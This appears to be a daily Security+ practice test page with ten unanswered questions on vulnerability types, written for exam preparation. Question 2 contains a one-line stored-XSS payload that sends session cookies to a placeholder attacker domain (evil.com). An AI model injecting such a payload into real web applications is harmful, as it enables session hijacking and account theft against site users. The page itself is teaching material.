CompTIA Security+ Practice Test of the Day 071525

Welcome to today’s CompTIA Security+ practice test!

Today’s practice test is based on Subdomain 2.3 (Explain various types of vulnerabilities) from the CompTIA Security+ SY0-701 objectives.

This beginner-level practice test is inspired by the CompTIA Security+ (SY0-701) exam and is designed to help you reinforce key cybersecurity concepts on a daily basis.

These questions are not official exam questions, nor are they brain dumps, but they reflect topics and scenarios relevant to the Security+ certification. Use them to test your knowledge, identify areas for improvement, and build daily cybersecurity habits.

Note: CompTIA and Security+ are registered trademarks of CompTIA. This content is not affiliated with or endorsed by CompTIA.

10 questions • Single best answer

Question 1
A web application displays customer order details by appending an order ID to the URL. A penetration tester enters a single quote after the order ID and receives a detailed database error message. Which vulnerability is MOST likely present?

Question 2
An attacker injects the string 'document.location='https://evil.com/?c='+document.cookie' into a product review field on an e-commerce site. Other users who view the product page have their session cookies sent to the attacker's server. Which vulnerability is being exploited?

Question 3
A security researcher discovers that a C++ application does not validate the length of user-supplied input before writing it to a fixed-size stack buffer. Providing input longer than the buffer size causes the application to crash and potentially allows arbitrary code execution. Which vulnerability is described?

Question 4
A banking application checks a user's account balance before approving a withdrawal, but a brief window exists between the balance check and the deduction. An attacker exploits this gap by initiating multiple simultaneous withdrawals, overdrawing the account. Which vulnerability type is described?

Question 5
A security researcher demonstrates that a vulnerability in a hypervisor allows a malicious virtual machine to access memory regions belonging to other VMs on the same host. Which virtualization vulnerability is described?

Question 6
A threat actor exploits a vulnerability in a popular application that was discovered and publicly disclosed the previous day. The vendor has not yet released a patch and no mitigation exists. Which vulnerability type does this represent?

Question 7
A cloud security audit reveals that an S3 bucket containing sensitive customer data has been configured with public read access, allowing anyone on the internet to download its contents. Which vulnerability type does this represent?

Question 8
A penetration tester injects shellcode into a running process's memory by exploiting an API call that allows writing to arbitrary memory addresses. The injected code executes with the same privileges as the target process. Which vulnerability type is described?

Question 9
A user jailbreaks their iPhone to install apps from outside the official App Store. A security administrator notes this creates significant risk for the organization. Which mobile device vulnerability does jailbreaking introduce?

Question 10
A security team discovers that a router's manufacturer released a firmware update containing malicious code after their build system was compromised. Devices that applied the update are now silently beaconing to an attacker-controlled server. Which vulnerability category BEST describes the root cause?